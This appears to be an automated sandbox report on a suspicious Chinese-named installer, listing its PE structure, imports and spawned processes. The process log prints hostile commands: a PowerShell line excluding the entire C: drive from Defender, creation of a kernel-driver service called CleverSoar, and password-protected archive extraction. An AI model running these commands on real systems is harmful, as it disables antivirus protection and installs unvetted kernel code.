                          Subsystem Version Minor:1
                          Import Hash:40ab50289f7ef5fae60801f88d4541fc

                          Entrypoint Preview

                          Instruction
                          push ebp
                          mov ebp, esp
                          add esp, FFFFFFA4h
                          push ebx
                          push esi
                          push edi
                          xor eax, eax
                          mov dword ptr [ebp-3Ch], eax
                          mov dword ptr [ebp-40h], eax
                          mov dword ptr [ebp-5Ch], eax
                          mov dword ptr [ebp-30h], eax
                          mov dword ptr [ebp-38h], eax
                          mov dword ptr [ebp-34h], eax
                          mov dword ptr [ebp-2Ch], eax
                          mov dword ptr [ebp-28h], eax
                          mov dword ptr [ebp-14h], eax
                          mov eax, 004A2EBCh
                          call 00007F33D4DE5105h
                          xor eax, eax
                          push ebp
                          push 004A8AC1h
                          push dword ptr fs:[eax]
                          mov dword ptr fs:[eax], esp
                          xor edx, edx
                          push ebp
                          push 004A8A7Bh
                          push dword ptr fs:[edx]
                          mov dword ptr fs:[edx], esp
                          mov eax, dword ptr [004B0634h]
                          call 00007F33D4E76A8Bh
                          call 00007F33D4E765DEh
                          lea edx, dword ptr [ebp-14h]
                          xor eax, eax
                          call 00007F33D4E712B8h
                          mov edx, dword ptr [ebp-14h]
                          mov eax, 004B41F4h
                          call 00007F33D4DDF1B3h
                          push 00000002h
                          push 00000000h
                          push 00000001h
                          mov ecx, dword ptr [004B41F4h]
                          mov dl, 01h
                          mov eax, dword ptr [0049CD14h]
                          call 00007F33D4E725E3h
                          mov dword ptr [004B41F8h], eax
                          xor edx, edx
                          push ebp
                          push 004A8A27h
                          push dword ptr fs:[edx]
                          mov dword ptr fs:[edx], esp
                          call 00007F33D4E76B13h
                          mov dword ptr [004B4200h], eax
                          mov eax, dword ptr [004B4200h]
                          cmp dword ptr [eax+0Ch], 01h
                          jne 00007F33D4E7D7FAh
                          mov eax, dword ptr [004B4200h]
                          mov edx, 00000028h
                          call 00007F33D4E72ED8h
                          mov edx, dword ptr [004B4200h]

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0xb70000x71.edata
                          IMAGE_DIRECTORY_ENTRY_IMPORT0xb50000xfec.idata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xcb0000x11000.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xba0000x10fa8.reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0xb90000x18.rdata
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0xb52d40x25c.idata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xb60000x1a4.didata
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x10000xa568c0xa5800b889d302f6fc48a904de33d8d947ae80False0.3620185045317221data6.377190161826806IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .itext0xa70000x1b640x1c00588dd0a8ab499300d3701cbd11b017d9False0.548828125data6.109264411030635IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .data0xa90000x38380x3a005c0c76e77aef52ebc6702430837ccb6eFalse0.35338092672413796data4.95916338709992IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .bss0xad0000x72580x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .idata0xb50000xfec0x1000627340dff539ef99048969aa4824fb2dFalse0.380615234375data5.020404933181373IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .didata0xb60000x1a40x200fd11c1109737963cc6cb7258063abfd6False0.34765625data2.729290535217263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .edata0xb70000x710x2007de8ca0c7a61668a728fd3a88dc0942dFalse0.1796875data1.305578535725827IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .tls0xb80000x180x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rdata0xb90000x5d0x200d84006640084dc9f74a07c2ff9c7d656False0.189453125data1.3892750148744617IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc0xba0000x10fa80x11000a85fda2741bd9417695daa5fc5a9d7a5False0.5789579503676471data6.709466460182023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          .rsrc0xcb0000x110000x11000338edf3ba219bca78cc4fc4306bc77d8False0.18772977941176472data3.7220745010189797IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                          Resources

                          NameRVASizeTypeLanguageCountryZLIB Complexity
                          RT_ICON0xcb6780xa68Device independent bitmap graphic, 64 x 128 x 4, image size 2048EnglishUnited States0.1174924924924925
                          RT_ICON0xcc0e00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.15792682926829268
                          RT_ICON0xcc7480x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.23387096774193547
                          RT_ICON0xcca300x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.39864864864864863
                          RT_ICON0xccb580x1628Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colorsEnglishUnited States0.08339210155148095
                          RT_ICON0xce1800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.1023454157782516
                          RT_ICON0xcf0280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.10649819494584838
                          RT_ICON0xcf8d00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.10838150289017341
                          RT_ICON0xcfe380x12e5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8712011577424024
                          RT_ICON0xd11200x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.05668398677373642
                          RT_ICON0xd53480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.08475103734439834
                          RT_ICON0xd78f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.09920262664165103
                          RT_ICON0xd89980x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.2047872340425532
                          RT_STRING0xd8e000x3f8data0.3198818897637795
                          RT_STRING0xd91f80x2dcdata0.36475409836065575
                          RT_STRING0xd94d40x430data0.40578358208955223
                          RT_STRING0xd99040x44cdata0.38636363636363635
                          RT_STRING0xd9d500x2d4data0.39226519337016574
                          RT_STRING0xda0240xb8data0.6467391304347826
                          RT_STRING0xda0dc0x9cdata0.6410256410256411
                          RT_STRING0xda1780x374data0.4230769230769231
                          RT_STRING0xda4ec0x398data0.3358695652173913
                          RT_STRING0xda8840x368data0.3795871559633027
                          RT_STRING0xdabec0x2a4data0.4275147928994083
                          RT_RCDATA0xdae900x10data1.5
                          RT_RCDATA0xdaea00x310data0.6173469387755102
                          RT_RCDATA0xdb1b00x2cdata1.2045454545454546
                          RT_GROUP_ICON0xdb1dc0xbcdataEnglishUnited States0.6170212765957447
                          RT_VERSION0xdb2980x584dataEnglishUnited States0.2754957507082153
                          RT_MANIFEST0xdb81c0x7a8XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3377551020408163

                          Imports

                          DLLImport
                          kernel32.dllGetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                          comctl32.dllInitCommonControls
                          user32.dllCreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                          oleaut32.dllSysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                          advapi32.dllConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey

                          Exports

                          NameOrdinalAddress
                          __dbk_fcall_wrapper20x40fc10
                          dbkFCallWrapperAddr10x4b063c

                          Possible Origin

                          Language of compilation systemCountry where language is spokenMap
                          EnglishUnited States

                          Network Behavior

                          No network behavior found

                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Target ID:0
                          Start time:21:42:26
                          Start date:24/12/2024
                          Path:C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe"
                          Imagebase:0xfd0000
                          File size:7'237'925 bytes
                          MD5 hash:704D909B74FDE4F05CEBA394FC91416B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:Borland Delphi
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:1
                          Start time:21:42:27
                          Start date:24/12/2024
                          Path:C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp" /SL5="$20442,6283511,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe"
                          Imagebase:0x220000
                          File size:3'366'912 bytes
                          MD5 hash:833E148BCEB71E3D12C96B53539F24E1
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:Borland Delphi
                          Antivirus matches:
                          • Detection: 1%, Virustotal, Browse
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:2
                          Start time:21:42:27
                          Start date:24/12/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                          Imagebase:0x7ff788560000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:3
                          Start time:21:42:27
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:4
                          Start time:21:42:31
                          Start date:24/12/2024
                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                          Imagebase:0x7ff693ab0000
                          File size:496'640 bytes
                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                          Has elevated privileges:true
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                          General

                          Target ID:5
                          Start time:21:42:35
                          Start date:24/12/2024
                          Path:C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe" /VERYSILENT
                          Imagebase:0xfd0000
                          File size:7'237'925 bytes
                          MD5 hash:704D909B74FDE4F05CEBA394FC91416B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:Borland Delphi
                          Reputation:low
                          Has exited:false

                          General

                          Target ID:6
                          Start time:21:42:36
                          Start date:24/12/2024
                          Path:C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp" /SL5="$302A6,6283511,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe" /VERYSILENT
                          Imagebase:0x470000
                          File size:3'366'912 bytes
                          MD5 hash:833E148BCEB71E3D12C96B53539F24E1
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:Borland Delphi
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:7
                          Start time:21:42:38
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:8
                          Start time:21:42:38
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:9
                          Start time:21:42:38
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:10
                          Start time:21:42:38
                          Start date:24/12/2024
                          Path:C:\Program Files (x86)\Windows NT\7zr.exe
                          Wow64 process (32bit):true
                          Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                          Imagebase:0xca0000
                          File size:831'200 bytes
                          MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Antivirus matches:
                          • Detection: 0%, ReversingLabs
                          • Detection: 0%, Virustotal, Browse
                          Has exited:true

                          General

                          Target ID:11
                          Start time:21:42:38
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:12
                          Start time:21:42:39
                          Start date:24/12/2024
                          Path:C:\Program Files (x86)\Windows NT\7zr.exe
                          Wow64 process (32bit):true
                          Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                          Imagebase:0xca0000
                          File size:831'200 bytes
                          MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:13
                          Start time:21:42:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:14
                          Start time:21:42:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:15
                          Start time:21:42:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:16
                          Start time:21:42:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:17
                          Start time:21:42:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:18
                          Start time:21:42:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:19
                          Start time:21:42:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:20
                          Start time:21:42:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:21
                          Start time:21:42:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:22
                          Start time:21:42:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:23
                          Start time:21:42:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:24
                          Start time:21:42:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:25
                          Start time:21:42:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:26
                          Start time:21:42:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:27
                          Start time:21:42:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:28
                          Start time:21:42:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:29
                          Start time:21:42:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:30
                          Start time:21:42:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:31
                          Start time:21:42:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:32
                          Start time:21:42:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:33
                          Start time:21:42:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:34
                          Start time:21:42:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:35
                          Start time:21:42:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:36
                          Start time:21:42:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:37
                          Start time:21:42:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:38
                          Start time:21:42:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
